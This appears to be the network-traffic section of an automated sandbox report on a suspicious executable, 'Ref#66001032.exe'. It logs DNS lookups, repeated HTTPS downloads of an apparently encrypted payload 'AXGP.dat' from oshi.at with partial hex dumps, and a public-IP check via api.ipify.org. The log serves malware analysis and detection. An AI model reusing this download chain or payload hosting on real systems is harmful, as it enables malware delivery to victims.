                                                                                                Jan 6, 2025 07:59:04.940696001 CET61116443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:04.943464041 CET61116443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:04.943475962 CET443611165.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:04.943685055 CET443611165.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:04.945769072 CET61116443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:04.991332054 CET443611165.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:08.089108944 CET61116443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:08.089202881 CET443611165.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:08.089361906 CET61116443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:08.089692116 CET61117443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:08.089723110 CET443611175.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:08.092678070 CET61117443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:08.092844963 CET61117443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:08.092856884 CET443611175.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:08.923820972 CET443611175.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:08.924057961 CET61117443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:08.925913095 CET61117443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:08.925924063 CET443611175.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:08.926163912 CET443611175.253.86.15192.168.2.6
                                                                                                Jan 6, 2025 07:59:08.927457094 CET61117443192.168.2.65.253.86.15
                                                                                                Jan 6, 2025 07:59:08.975332022 CET443611175.253.86.15192.168.2.6

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Jan 6, 2025 07:54:59.611114979 CET5963653192.168.2.61.1.1.1
                                                                                                Jan 6, 2025 07:54:59.626437902 CET53596361.1.1.1192.168.2.6
                                                                                                Jan 6, 2025 07:55:16.228774071 CET53634681.1.1.1192.168.2.6
                                                                                                Jan 6, 2025 07:55:17.617988110 CET53629831.1.1.1192.168.2.6
                                                                                                Jan 6, 2025 07:57:12.803147078 CET6276653192.168.2.61.1.1.1
                                                                                                Jan 6, 2025 07:57:12.810350895 CET53627661.1.1.1192.168.2.6

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Jan 6, 2025 07:54:59.611114979 CET192.168.2.61.1.1.10x302dStandard query (0)oshi.atA (IP address)IN (0x0001)false
                                                                                                Jan 6, 2025 07:57:12.803147078 CET192.168.2.61.1.1.10x9987Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Jan 6, 2025 07:54:59.626437902 CET1.1.1.1192.168.2.60x302dNo error (0)oshi.at5.253.86.15A (IP address)IN (0x0001)false
                                                                                                Jan 6, 2025 07:54:59.626437902 CET1.1.1.1192.168.2.60x302dNo error (0)oshi.at194.15.112.248A (IP address)IN (0x0001)false
                                                                                                Jan 6, 2025 07:55:05.545063972 CET1.1.1.1192.168.2.60xda75No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 6, 2025 07:55:05.545063972 CET1.1.1.1192.168.2.60xda75No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                Jan 6, 2025 07:57:12.810350895 CET1.1.1.1192.168.2.60x9987No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                Jan 6, 2025 07:57:12.810350895 CET1.1.1.1192.168.2.60x9987No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                Jan 6, 2025 07:57:12.810350895 CET1.1.1.1192.168.2.60x9987No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                Jan 6, 2025 07:58:21.144951105 CET1.1.1.1192.168.2.60x70c2No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 6, 2025 07:58:21.144951105 CET1.1.1.1192.168.2.60x70c2No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false

                                                                                                HTTP Request Dependency Graph

                                                                                                • oshi.at
                                                                                                • api.ipify.org

                                                                                                HTTPS Proxied Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.6497135.253.86.154432736C:\Users\user\Desktop\Ref#66001032.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-06 06:55:00 UTC186OUTGET /YBbz HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                Host: oshi.at
                                                                                                Connection: Keep-Alive
                                                                                                2025-01-06 06:55:35 UTC317INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Mon, 06 Jan 2025 06:55:35 GMT
                                                                                                Content-Type: application/octet-stream
                                                                                                Content-Length: 1223688
                                                                                                Connection: close
                                                                                                Accept-Ranges: bytes
                                                                                                Last-Modified: Sun, 05 Jan 2025 23:17:21 GMT
                                                                                                Content-Disposition: attachment; filename=AXGP.dat
                                                                                                ETag: "a6db55e686be5ecbf68d759d0c4a9c0f"
                                                                                                2025-01-06 06:55:35 UTC3766INData Raw: 69 a0 a8 dc 4f a4 0e 98 0f 3e d2 2c d5 1a 70 d4 6b cb 8e d4 c9 a6 48 96 dc 87 93 94 0f eb 43 a0 4d 49 94 20 e6 38 e2 92 1a a0 fa 16 c2 ed bb 6d 78 70 e1 89 3d 75 3f 0e b4 ca 0e 9e 75 c2 97 9b cb c2 df e1 aa c7 a4 4c 68 de de 33 b1 1b 6b fe 88 bd 3e 1d 37 27 da e9 a7 a7 a2 77 d0 69 31 9b 47 ab 86 6c 20 d2 91 2b 7f 9f b6 ad 76 28 cb 75 37 35 74 e9 f2 3d 15 54 68 74 e2 4b e3 25 15 5b b5 ea d6 6e 22 1e 7f d9 d0 73 38 7d 8e c5 86 5a 44 f6 5e de 1d ab 21 09 7a b2 ad c8 af ea 00 a3 49 6f 85 bb cf 49 33 ad 90 3b 96 33 9a 6a f1 ab 0d 14 f8 28 5c 18 04 69 6d 20 b5 af 65 cd 56 8c 75 55 ac 87 b8 d4 8a 58 ba 79 f6 aa 33 90 17 b7 63 f3 4c 99 d1 41 01 11 61 69 23 be 5b 85 14 2f 89 8f 93 bc 1c ed d8 e6 e6 0b 06 f6 01 33 93 2b 29 ac 06 fb ae b2 a1 1b 30 74 1c df e0 5d 24
                                                                                                Data Ascii: iO>,pkHCMI 8mxp=u?uLh3k>7'wi1Gl +v(u75t=ThtK%[n"s8}ZD^!zIoI3;3j(\im eVuUXy3cLAai#[/3+)0t]$
                                                                                                2025-01-06 06:55:35 UTC4096INData Raw: a1 9d fd df 6e cf 45 74 f5 d7 6a 84 a3 76 2d c7 0a d6 ac 61 4c 6b 1e 89 ae 48 bf bf 60 e8 ee 2f fb da 40 03 c7 31 c0 35 b3 ec 29 aa 08 25 e3 e5 79 60 84 f7 94 63 08 5f 9e ed 7f 8e ba 21 49 9d 66 1d 77 22 d9 51 01 50 d0 38 f0 e9 b2 e6 15 a7 1f 12 b0 57 3d 6a 85 78 62 4e af e2 b0 23 29 e7 1c 02 2a 61 18 eb e4 ed b3 97 9e ba c8 a8 d2 d1 cd 00 54 d4 9d eb 86 63 f4 0f c6 30 a8 25 b2 21 da fc 0b 1a 46 b5 99 32 c3 e5 3c 43 11 4a d9 18 74 fd cd af 13 c0 e0 7f da 2f 35 64 79 da 2f 3d 03 02 13 ad af b6 30 4c 09 5a 8c ce a1 17 38 bb ca 63 cd 45 1e da 05 87 44 d0 e4 0c d3 9b 3f 37 14 da ce a6 5e c9 1b f4 e5 14 34 41 6f 4f c5 44 eb 26 7d ff 99 e2 3c af 80 c5 1e 15 a6 08 e2 66 c7 aa d9 2f f9 cb be a4 3b b7 72 9f e2 f0 a9 d0 73 9e 4a e6 75 ba 01 e0 f5 29 39 7c f7 9e e4
                                                                                                Data Ascii: nEtjv-aLkH`/@15)%y`c_!Ifw"QP8W=jxbN#)*aTc0%!F2<CJt/5dy/=0LZ8cED?7^4AoOD&}<f/;rsJu)9|
                                                                                                2025-01-06 06:55:35 UTC4096INData Raw: 49 8c 8d 9a a2 22 d0 e6 57 a7 84 be 79 cd 40 e1 96 d4 73 8d f9 68 90 17 e5 2f f6 8d a3 7e d7 2e ab be d7 d2 d6 31 92 8e fc 99 e3 ff f6 73 1f 20 83 3b ca 9d 2c 4e 15 b8 33 32 85 e4 92 c4 6c 05 80 bc 03 b9 11 f6 89 f2 de e1 70 83 92 81 cb a9 36 30 98 c5 f4 ea 87 49 9b 82 04 54 65 67 54 a3 d3 aa 92 85 0d 58 5c 02 d4 57 ff 61 27 92 d2 cb bc 8d d1 63 39 77 0b 0f df 18 7b d3 37 6e 4a d6 85 ca 3a 30 d4 a7 da 6f 65 b5 0e 70 b4 de bb d8 10 c3 c5 1c ea 73 c1 ef c4 bb 56 a1 09 77 f5 d5 51 01 ff ae e5 69 bf d4 8a 4b b7 39 1e 2d 7f 7e f4 66 f8 be 4d ec e8 c5 45 79 66 4c a4 7b 50 13 be 0e 80 6f d4 ae 53 e4 2b f8 29 d4 78 e4 0b 6e e8 66 53 39 00 46 01 8c bc 35 e5 50 ce 47 dd 9b d5 b6 87 25 36 16 47 f8 6c 5c 66 26 9f 8f 1f 2e f3 3a d4 56 a8 66 b5 44 12 a4 c0 03 c0 d6 e6
                                                                                                Data Ascii: I"Wy@sh/~.1s ;,N32lp60ITegTX\Wa'c9w{7nJ:0oepsVwQiK9-~fMEyfL{PoS+)xnfS9F5PG%6Gl\f&.:VfD
                                                                                                2025-01-06 06:55:35 UTC1081INData Raw: 31 46 1b 4a b7 49 f9 6a 47 52 98 83 1d 1e 94 df a5 ca 5e ce 28 0e 26 1d 01 83 c0 f0 c6 b8 34 cb a8 df db 08 f2 64 e9 32 28 db ac 12 4e f1 b8 f3 fe 1b 13 58 93 86 9c 3b 5b a9 b6 bb 00 bd a7 76 ab e6 5b b5 af b3 cb 4b ac 67 f6 1c d8 a1 b5 6f 09 49 e6 a5 b1 89 ab be 08 2b 43 95 03 75 92 8f ab 18 f6 ad 4c b6 83 e4 b5 0c 32 2c f7 a3 9c 39 00 19 26 9f 28 b6 0f 21 12 58 ad b4 90 5d 95 72 69 a6 bf fb fb b9 89 1b 04 ca d7 55 be 94 5b 8b da 36 6b 16 57 e9 21 20 21 29 ff 20 79 5d 2b 68 59 f3 4f 5c 75 6a a9 37 9d 07 da 81 23 c6 d2 33 e0 eb d8 75 7b cb f4 a8 11 5c d3 a3 bb c2 4e d2 fe 33 57 86 f7 31 e0 71 44 33 2a ec 5b a2 6b 03 d5 e6 82 79 85 fc 5a c7 00 64 4e 11 97 ae ea 03 06 86 b2 c5 7e b2 75 88 12 8f 9c f5 60 cc 7a 2f 22 25 a4 aa 76 65 69 d0 24 cf 4d 18 0a de 86
                                                                                                Data Ascii: 1FJIjGR^(&4d2(NX;[v[KgoI+CuL2,9&(!X]riU[6kW! !) y]+hYO\uj7#3u{\N3W1qD3*[kyZdN~u`z/"%vei$M
                                                                                                2025-01-06 06:55:36 UTC4096INData Raw: a1 35 46 1d b7 26 4c c1 6e b1 a8 c4 2d 63 6b dc 7e 91 22 4e 0c 38 55 6d 8e 5f 82 2a 62 74 92 ee 2e fe 3a 26 e6 7d 4e c2 76 b3 61 bc 2c bc 9f 41 a1 e3 79 2d f0 b0 86 a4 37 ee 5c bc 06 b9 53 99 e0 65 5f ac 49 51 49 30 91 18 de 2e 40 ee c8 cf 70 fc 46 4a c9 97 68 4b 6d 33 17 1e c8 ac 1f 37 d1 65 7e 8a 31 dc 26 a5 1e 41 e4 d6 f0 e4 cf e0 87 eb b3 98 a8 0b 32 f3 5a 90 a2 37 1b 0b 67 ff ad 05 7e 60 eb 24 6d eb 01 a7 1f 30 e6 b3 2b e4 da 40 5a 5a 7f 9b 8c 4d a4 d5 d1 fc 69 42 e6 17 42 f8 3e e8 21 ed fd 4b dd 18 d8 01 8b c9 d2 46 a3 e0 38 ca 1b fd 82 bb 01 fb 53 20 d5 90 11 d1 e3 2e fa fa 35 2a f8 c7 89 b3 85 56 ee f9 5c 75 79 3e 27 0b 2b 64 47 81 a3 34 d8 09 2b b5 ac 59 d9 b3 74 27 9d ce 33 c8 5f 22 52 ec 3b 75 bb a0 8c c2 00 52 59 b7 00 da 15 11 83 5f 0b 01 2b
                                                                                                Data Ascii: 5F&Ln-ck~"N8Um_*bt.:&}Nva,Ay-7\Se_IQI0.@pFJhKm37e~1&A2Z7g~`$m0+@ZZMiBB>!KF8S .5*V\uy>'+dG4+Yt'3_"R;uRY_+
                                                                                                2025-01-06 06:55:36 UTC4096INData Raw: ee 29 fd 5c 58 56 6e 92 a1 f4 83 df 2d 44 20 19 ae c6 d7 30 08 2d f9 6d 65 cd f2 b8 06 5a a4 40 2e 49 be db 43 d4 80 8b 78 88 2e 61 83 d9 80 7f c5 39 ca c4 68 e9 32 fa 7e 17 0b 6e 00 69 a6 33 7d 6b 12 d8 40 01 24 3f bb 1e 07 15 c3 93 dd 21 94 e2 99 70 43 8a 42 e9 3c d7 23 d3 43 b5 5d 48 9d ea cc bb e3 8e f7 9a 26 6b 18 2f 02 08 3a 5f a3 b9 e6 52 43 ef 51 f2 b0 3b 07 e8 18 17 4a 3e b0 05 40 e0 72 e6 2a c7 9e 52 4c 04 a9 d7 ec 07 a4 d2 4f 37 03 07 3b 10 91 40 e4 dd b2 6a 4d 49 87 9e d7 ff 80 31 ee b5 c8 31 67 98 73 78 5d 45 e8 74 ef 0f d8 cd b9 06 38 c9 56 41 88 e4 40 1d 65 94 1f 22 a5 fc e1 2a f6 b0 21 34 68 22 e9 fd e5 fa 1d b8 5d c7 70 7e ef 5d 49 4c 91 18 fb b9 c5 a5 e5 fd b6 f1 b8 73 4c d4 52 34 f8 d4 c6 eb 6e a7 f2 96 62 37 5f 74 5f 38 a2 2b e8 db 2b
                                                                                                Data Ascii: )\XVn-D 0-meZ@.ICx.a9h2~ni3}k@$?!pCB<#C]H&k/:_RCQ;J>@r*RLO7;@jMI11gsx]Et8VA@e"*!4h"]p~]ILsLR4nb7_t_8++
                                                                                                2025-01-06 06:55:36 UTC4096INData Raw: fc e1 c0 cd 3f cd 0e 24 3b 58 7c e8 1c 71 54 87 7b e3 46 2f 78 c3 fa 30 ea fd 04 62 31 54 d9 39 32 99 1f d1 11 fb 1a ce 6d e2 20 3a e8 47 ce 80 3b 72 d1 88 65 4d 8d 87 28 b9 32 be 46 bf 5a bd d6 b4 b2 2a 7d f1 f5 09 95 0e 99 7f 1a 91 60 b1 03 30 e8 cd 4b 8e dc cc 40 be 91 1c 6f 98 56 bb 45 24 68 8c 8c 8d a8 50 3d 77 e7 41 d2 9a 57 6c a0 00 a6 b8 36 11 e1 f1 d7 c6 fd ac 41 0c 1c 8d c6 4d 9d 7e 7e 58 d9 2b 4f e1 ec 28 3b 6e a7 db a2 60 83 50 97 d6 59 a5 dc b5 75 6d 1c d2 c7 96 ca e5 f3 03 8e 22 af 8c 80 f2 fd bd 44 0e 33 c0 cf c7 ef ef 23 37 86 c4 61 73 22 01 34 be 60 a5 a4 0f 08 db 83 89 c2 27 a7 cb 0f 77 c7 17 8a 1f d3 8e e1 95 50 f2 a0 ac c3 65 ca 5c 80 1e d5 26 74 27 09 9b 53 8a 23 90 50 72 b5 7f f1 1b 74 e0 06 cb 88 91 2f 9a 3a f1 f7 70 a9 be 66 f2 ce
                                                                                                Data Ascii: ?$;X|qT{F/x0b1T92m :G;reM(2FZ*}`0K@oVE$hP=wAWl6AM~~X+O(;n`PYum"D3#7as"4`'wPe\&t'S#Prt/:pf
                                                                                                2025-01-06 06:55:36 UTC4096INData Raw: 75 b0 15 e3 c8 e0 7e cd c9 70 b1 de 05 ad 25 94 11 c6 34 53 81 48 b7 d1 c4 9f db ec e4 f5 e0 e6 ee 0f 8d 19 49 a6 3f ba de bd 32 44 35 46 91 5c 7c f3 a3 fe 4f eb 16 f1 19 33 cb 8f 9b ee b9 cf 97 a5 99 eb 43 35 d9 97 09 63 ef 3f 8c 27 9b 53 6e 69 a4 ee b8 41 5f f8 f3 b3 fd 16 3c 67 c8 99 76 40 73 22 75 95 24 15 b3 47 d5 c8 c0 af cd d1 bc 74 14 1f 0e be fd d3 70 4b 54 99 6a d4 28 de e5 c3 31 a2 c3 f7 56 0f c1 77 91 4c 6b 6b 3f 52 c9 a5 bf fc 9b 00 4c 05 2c 6e bb 07 c9 5b 6a 74 7c ba 5f a8 6f 6b 74 7c e4 5c 43 20 74 6d 21 a8 fa ff 72 b1 4f 4d 1d 9a 23 f3 75 f8 01 87 8a 6c ef 49 f0 d1 4c 65 bb 3c 2e f1 b0 cd 6c fe 63 b6 7f fc c2 26 13 53 69 e5 19 1f 91 fc 2e a6 67 f6 9c 31 54 93 9c 9b 52 06 aa 6d ef 8b 54 ff e0 17 6b 4d 3a 84 c9 f7 b5 0c f8 5a 7b 40 1e 9f c7
                                                                                                Data Ascii: u~p%4SHI?2D5F\|O3C5c?'SniA_<gv@s"u$GtpKTj(1VwLkk?RL,n[jt|_okt|\C tm!rOM#ulILe<.lc&Si.g1TRmTkM:Z{@
                                                                                                2025-01-06 06:55:36 UTC4096INData Raw: dd f8 9e ac 61 0e 0f 6b 1a be 56 a2 d9 26 00 f8 57 c5 14 2e f5 9d 53 2b a9 54 99 23 b6 1d cc b6 c3 b8 92 55 e0 e2 c6 6a d0 61 f3 fe cf 44 98 e9 b8 63 e1 16 1d 68 f4 5a e4 d1 fc 57 f8 b0 43 58 61 5b 35 43 45 e9 cb b4 d9 53 a9 cf c1 cd 8e c3 85 37 d8 b6 3d 81 43 a8 b0 4d 00 7d f1 05 80 ad 98 3c f0 09 41 20 b7 d9 52 2b bb 63 4f 68 9c 62 94 b2 3f 9a b0 cf b5 fe 89 3b 75 69 b1 b3 7d 3e 70 45 1d 0b 70 b7 4f 2f 0c 34 f3 d6 66 0e 33 ad 94 80 5a 6a 40 34 68 38 fe c5 10 b5 74 88 18 07 7e e6 8f 81 05 dc 64 fa a2 eb 9f ca 04 7f 2c cd cb 99 e9 96 17 76 b7 62 35 2a 5b 61 a8 78 41 a8 3b b1 e7 32 46 c8 6a 0a 76 6c ea 54 27 32 1e 13 fa 38 63 9a 12 71 51 d8 7e 28 4d a6 3a 60 26 20 54 dd 4b 27 4f e8 33 11 3e 2c 1a 7c 97 27 03 0b 46 bd a9 69 5c 8c b3 ff 7c 8b 9c 9a 53 a3 b5
                                                                                                Data Ascii: akV&W.S+T#UjaDchZWCXa[5CES7=CM}<A R+cOhb?;ui}>pEpO/4f3Zj@4h8t~d,vb5*[axA;2FjvlT'28cqQ~(M:`& TK'O3>,|'Fi\|S
                                                                                                2025-01-06 06:55:36 UTC4096INData Raw: 80 70 b5 cc 6d 10 26 d4 ba 41 21 c0 9e 46 d7 aa 15 2d 59 0e 95 55 15 98 23 ce 18 bd 77 6c 27 12 cc b4 65 1a 0e 2b 76 8d 8c 22 e5 e9 a5 e1 40 fe dd be 19 4c 85 a5 d3 81 2d 0e be f9 0c b2 32 b2 f1 6f d5 18 d2 6f f9 ee 93 0f 75 96 7d 75 5f b4 7d c2 37 d8 74 6f a9 9d 5c c8 b7 ca 40 d0 2c 67 6f 2b 07 69 4d 32 c8 90 11 c9 8f 74 a9 9a e7 01 dd 38 14 54 8a 30 b5 ff 02 df d0 18 10 f6 3c b1 a9 da 3e ad 00 33 f3 b4 98 86 bf 25 9a 30 55 0c 93 f2 4c 0a fa 26 41 c2 fd 66 86 65 e9 45 8d 53 18 95 4f a6 68 0b 2c 83 c9 a9 9e 4d 71 8b cc 2e 1b aa 40 3d 8b 71 7a c8 25 d6 2d 9c 8b e5 64 b6 b4 13 52 ab 26 d0 b8 b7 ca 95 70 41 64 cc 8a db 85 64 a9 52 17 70 24 0f d0 9e 85 a7 86 11 76 83 7e 2b 1f 27 f0 74 e9 c8 d2 bb a9 a1 9b d4 31 14 74 6b 3b 92 b6 d9 4d e5 77 6c 41 69 7c f7 a0
                                                                                                Data Ascii: pm&A!F-YU#wl'e+v"@L-2oou}u_}7to\@,go+iM2t8T0<>3%0UL&AfeESOh,Mq.@=qz%-dR&pAddRp$v~+'t1tk;MwlAi|


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.6610895.253.86.154432736C:\Users\user\Desktop\Ref#66001032.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-06 06:56:14 UTC162OUTGET /YBbz HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                Host: oshi.at


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.6610905.253.86.154432736C:\Users\user\Desktop\Ref#66001032.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-06 06:56:28 UTC162OUTGET /YBbz HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                Host: oshi.at


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.6610925.253.86.154432736C:\Users\user\Desktop\Ref#66001032.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-06 06:56:53 UTC162OUTGET /YBbz HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                Host: oshi.at
                                                                                                2025-01-06 06:56:55 UTC317INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Mon, 06 Jan 2025 06:56:55 GMT
                                                                                                Content-Type: application/octet-stream
                                                                                                Content-Length: 1223688
                                                                                                Connection: close
                                                                                                Last-Modified: Sun, 05 Jan 2025 23:17:21 GMT
                                                                                                Accept-Ranges: bytes
                                                                                                Content-Disposition: attachment; filename=AXGP.dat
                                                                                                ETag: "a6db55e686be5ecbf68d759d0c4a9c0f"
                                                                                                2025-01-06 06:56:55 UTC3766INData Raw: 69 a0 a8 dc 4f a4 0e 98 0f 3e d2 2c d5 1a 70 d4 6b cb 8e d4 c9 a6 48 96 dc 87 93 94 0f eb 43 a0 4d 49 94 20 e6 38 e2 92 1a a0 fa 16 c2 ed bb 6d 78 70 e1 89 3d 75 3f 0e b4 ca 0e 9e 75 c2 97 9b cb c2 df e1 aa c7 a4 4c 68 de de 33 b1 1b 6b fe 88 bd 3e 1d 37 27 da e9 a7 a7 a2 77 d0 69 31 9b 47 ab 86 6c 20 d2 91 2b 7f 9f b6 ad 76 28 cb 75 37 35 74 e9 f2 3d 15 54 68 74 e2 4b e3 25 15 5b b5 ea d6 6e 22 1e 7f d9 d0 73 38 7d 8e c5 86 5a 44 f6 5e de 1d ab 21 09 7a b2 ad c8 af ea 00 a3 49 6f 85 bb cf 49 33 ad 90 3b 96 33 9a 6a f1 ab 0d 14 f8 28 5c 18 04 69 6d 20 b5 af 65 cd 56 8c 75 55 ac 87 b8 d4 8a 58 ba 79 f6 aa 33 90 17 b7 63 f3 4c 99 d1 41 01 11 61 69 23 be 5b 85 14 2f 89 8f 93 bc 1c ed d8 e6 e6 0b 06 f6 01 33 93 2b 29 ac 06 fb ae b2 a1 1b 30 74 1c df e0 5d 24
                                                                                                Data Ascii: iO>,pkHCMI 8mxp=u?uLh3k>7'wi1Gl +v(u75t=ThtK%[n"s8}ZD^!zIoI3;3j(\im eVuUXy3cLAai#[/3+)0t]$
                                                                                                2025-01-06 06:56:55 UTC4096INData Raw: a1 9d fd df 6e cf 45 74 f5 d7 6a 84 a3 76 2d c7 0a d6 ac 61 4c 6b 1e 89 ae 48 bf bf 60 e8 ee 2f fb da 40 03 c7 31 c0 35 b3 ec 29 aa 08 25 e3 e5 79 60 84 f7 94 63 08 5f 9e ed 7f 8e ba 21 49 9d 66 1d 77 22 d9 51 01 50 d0 38 f0 e9 b2 e6 15 a7 1f 12 b0 57 3d 6a 85 78 62 4e af e2 b0 23 29 e7 1c 02 2a 61 18 eb e4 ed b3 97 9e ba c8 a8 d2 d1 cd 00 54 d4 9d eb 86 63 f4 0f c6 30 a8 25 b2 21 da fc 0b 1a 46 b5 99 32 c3 e5 3c 43 11 4a d9 18 74 fd cd af 13 c0 e0 7f da 2f 35 64 79 da 2f 3d 03 02 13 ad af b6 30 4c 09 5a 8c ce a1 17 38 bb ca 63 cd 45 1e da 05 87 44 d0 e4 0c d3 9b 3f 37 14 da ce a6 5e c9 1b f4 e5 14 34 41 6f 4f c5 44 eb 26 7d ff 99 e2 3c af 80 c5 1e 15 a6 08 e2 66 c7 aa d9 2f f9 cb be a4 3b b7 72 9f e2 f0 a9 d0 73 9e 4a e6 75 ba 01 e0 f5 29 39 7c f7 9e e4
                                                                                                Data Ascii: nEtjv-aLkH`/@15)%y`c_!Ifw"QP8W=jxbN#)*aTc0%!F2<CJt/5dy/=0LZ8cED?7^4AoOD&}<f/;rsJu)9|
                                                                                                2025-01-06 06:56:55 UTC4096INData Raw: 49 8c 8d 9a a2 22 d0 e6 57 a7 84 be 79 cd 40 e1 96 d4 73 8d f9 68 90 17 e5 2f f6 8d a3 7e d7 2e ab be d7 d2 d6 31 92 8e fc 99 e3 ff f6 73 1f 20 83 3b ca 9d 2c 4e 15 b8 33 32 85 e4 92 c4 6c 05 80 bc 03 b9 11 f6 89 f2 de e1 70 83 92 81 cb a9 36 30 98 c5 f4 ea 87 49 9b 82 04 54 65 67 54 a3 d3 aa 92 85 0d 58 5c 02 d4 57 ff 61 27 92 d2 cb bc 8d d1 63 39 77 0b 0f df 18 7b d3 37 6e 4a d6 85 ca 3a 30 d4 a7 da 6f 65 b5 0e 70 b4 de bb d8 10 c3 c5 1c ea 73 c1 ef c4 bb 56 a1 09 77 f5 d5 51 01 ff ae e5 69 bf d4 8a 4b b7 39 1e 2d 7f 7e f4 66 f8 be 4d ec e8 c5 45 79 66 4c a4 7b 50 13 be 0e 80 6f d4 ae 53 e4 2b f8 29 d4 78 e4 0b 6e e8 66 53 39 00 46 01 8c bc 35 e5 50 ce 47 dd 9b d5 b6 87 25 36 16 47 f8 6c 5c 66 26 9f 8f 1f 2e f3 3a d4 56 a8 66 b5 44 12 a4 c0 03 c0 d6 e6
                                                                                                Data Ascii: I"Wy@sh/~.1s ;,N32lp60ITegTX\Wa'c9w{7nJ:0oepsVwQiK9-~fMEyfL{PoS+)xnfS9F5PG%6Gl\f&.:VfD
                                                                                                2025-01-06 06:56:55 UTC1081INData Raw: 31 46 1b 4a b7 49 f9 6a 47 52 98 83 1d 1e 94 df a5 ca 5e ce 28 0e 26 1d 01 83 c0 f0 c6 b8 34 cb a8 df db 08 f2 64 e9 32 28 db ac 12 4e f1 b8 f3 fe 1b 13 58 93 86 9c 3b 5b a9 b6 bb 00 bd a7 76 ab e6 5b b5 af b3 cb 4b ac 67 f6 1c d8 a1 b5 6f 09 49 e6 a5 b1 89 ab be 08 2b 43 95 03 75 92 8f ab 18 f6 ad 4c b6 83 e4 b5 0c 32 2c f7 a3 9c 39 00 19 26 9f 28 b6 0f 21 12 58 ad b4 90 5d 95 72 69 a6 bf fb fb b9 89 1b 04 ca d7 55 be 94 5b 8b da 36 6b 16 57 e9 21 20 21 29 ff 20 79 5d 2b 68 59 f3 4f 5c 75 6a a9 37 9d 07 da 81 23 c6 d2 33 e0 eb d8 75 7b cb f4 a8 11 5c d3 a3 bb c2 4e d2 fe 33 57 86 f7 31 e0 71 44 33 2a ec 5b a2 6b 03 d5 e6 82 79 85 fc 5a c7 00 64 4e 11 97 ae ea 03 06 86 b2 c5 7e b2 75 88 12 8f 9c f5 60 cc 7a 2f 22 25 a4 aa 76 65 69 d0 24 cf 4d 18 0a de 86
                                                                                                Data Ascii: 1FJIjGR^(&4d2(NX;[v[KgoI+CuL2,9&(!X]riU[6kW! !) y]+hYO\uj7#3u{\N3W1qD3*[kyZdN~u`z/"%vei$M
